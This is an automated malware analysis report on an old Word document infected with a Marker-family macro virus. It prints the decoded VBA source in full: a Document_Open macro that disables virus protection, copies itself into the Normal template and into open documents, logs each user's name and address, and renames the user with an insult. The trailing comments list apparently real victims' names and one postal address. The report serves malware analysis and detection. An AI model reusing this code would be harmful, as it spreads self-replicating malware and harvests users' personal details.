Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8fd74f41b9d67ad7…

MALICIOUS

Office (OLE)

Size: 41.0 KB
Created: 2001-02-21 07:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6f8a4198ac63dda7c9aa2e5018791c89
SHA-1: f0c355a7920e0bd99fb5655dd79d48e6b5d188f2
SHA-256: 8fd74f41b9d67ad77931cbb81e4d298a475e0fd479b5fd6db5b278a02e275a33
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro appears to be obfuscated and attempts to spread itself to the NormalTemplate, likely to achieve persistence or facilitate further malicious actions. The document body itself is a letter concerning a debt and phone number transfer, which serves as a lure for the macro execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-15 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-15
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26163 bytes
SHA-256: 150d2b265e93b6b6cb301a0b95d3e6e07e62f9bc6420c9af7c0d1face1d91044
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'Couldn't be bothered to write macros
































































Private Sub Document_Open()

On Error Resume Next

Const test = "Это не вирус. Просто прикол ;)"

'Variable declarations
Dim SaveDocument, SaveNormalTemplate, DocumentPrepared, NormalTemplatePrepared As Boolean
Dim ad, nt As Object
Dim Code, UserAddress, LogData, LogFile As String

'Variable initialization
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
NormalTemplatePrepared = nt.CodeModule.Find(test, 0, 0, 0, 0)

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
DocumentPrepared = ad.CodeModule.Find(test, 0, 0, 0, 0)

'Change the options a little to optimize operation
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False

'Infect NormalTemplate
If (ad.CodeModule.Find(test, 0, 0, 0, 0) = True And _
    nt.CodeModule.Find(test, 0, 0, 0, 0) = False) Then
   
    Code = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
   
    Code = Code & Chr(13) & _
              "' " & Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
 
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString Code
End If

'Infect the active document
If nt.CodeModule.Find(test, 0, 0, 0, 0) = True And _
  ad.CodeModule.Find(test, 0, 0, 0, 0) = False Then

  Code = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
  ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
  ad.CodeModule.AddFromString Code
End If

'If it is Friday the 13th, the machine is done for
If (Day(Now()) = 13) And (WeekDay(Now()) = 6) Then
  Value = MsgBox("Сегодня пятница, 13. Следовательно, на вашей тачке страшный вирус! Хи-хи :) Будем лечить?", vbYesNo)
  If Value = vbYes Then
    MsgBox ("А-а-а-а!!! Не лечится... Хана тачке :(((")
  Else
    MsgBox ("Правильное решение. Тупая шутка")
  End If
End If

  If Right(Application.UserName, 4) <> "лох!" Then
    Application.UserName = Application.UserName + " - лох!"
  End If
  ActiveDocument.Save
  
End Sub


























































'Phew, finally let go of the Enter key :o)
' Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet - лох!
'



' Saturday, 28 Nov 1998
' MARK B. SEAY - лох!
'



' Friday, 4 Dec 1998
' UPS - лох!
'



' Thursday, 17 Dec 1998
' WRO - лох!
'



' Tuesday, 22 Dec 1998
' bd04619 - лох!
'



' Monday, 4 Jan 1999
' ss04789 - лох!
'



' Wednesday, 6 Jan 1999
' JDIETZ - лох!
'



' Saturday, 23 Jan 1999
' W95INST - лох!
'



' Tuesday, 26 Jan 1999
' cbreivis - лох!
'



' Monday, 1 Feb 1999
' C & L User - лох!
'



' Friday, 5 Feb 1999
' Davidson - лох!
'



' Monday, 8 Feb 1999
' uperstl
'



' Tuesday, 16 Feb 1999
' rkeeble - лох!
'



' Thursday, 18 Feb 1999
' pcosgrov - лох!
'



' Friday, 19 Feb 1999
' lyoung - лох!
'



' Tuesday, 23 Feb 1999
' Giuseppe Bacco - лох!
'



' Tuesday, 23 Feb 1999
' jstewart - лох!
'



' вторник, 2 мар 1999
' Korneyev - лох!
' Україна, 252030, м.Київ, вул. Б.Хмельницького, 46
' ТОВ "Перспектива-ТБ"



' понедельник, 3 мар 1997
' Administrator - лох!
'



' понедельник, 22 мар 1999
' den - лох!
... (truncated)